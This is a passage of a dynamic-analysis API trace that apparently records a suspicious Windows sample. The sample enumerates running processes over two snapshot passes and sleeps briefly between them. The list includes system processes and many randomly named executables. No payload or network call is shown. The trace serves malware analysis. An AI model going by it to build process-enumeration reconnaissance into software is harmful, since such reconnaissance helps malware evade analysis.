cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.347] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.348] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.349] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.349] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0117.350] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.351] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.352] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0117.400] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.401] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0117.403] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0117.404] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0117.405] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0117.406] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.407] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0117.408] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0117.409] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0117.410] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0117.412] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0117.413] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0117.414] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0117.416] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0117.417] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0117.419] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0117.420] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0117.422] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0117.423] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0117.425] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0117.426] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0117.427] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0117.429] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0117.430] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0117.432] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0117.433] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0117.435] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0117.436] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.437] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0117.439] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0117.440] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0117.441] CloseHandle (hObject=0xbc) returned 1 [0117.441] Sleep (dwMilliseconds=0x12c) [0118.029] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0118.039] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0118.040] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0118.041] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0118.042] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0118.043] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0118.044] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0118.044] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0118.045] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0118.046] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0118.047] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0118.048] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.049] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.050] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.051] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.052] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.053] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0118.054] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.055] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.056] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0118.057] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.059] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0118.060] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0118.258] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0118.260] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0118.261] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.263] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0118.264] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0118.266] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0118.267] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0118.269] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0118.270] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0118.272] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0118.284] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0118.285] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0118.287] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0118.288] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0118.290] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0118.291] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0118.293] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0118.294] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0118.296] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0118.297] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0118.299] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0118.300] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, 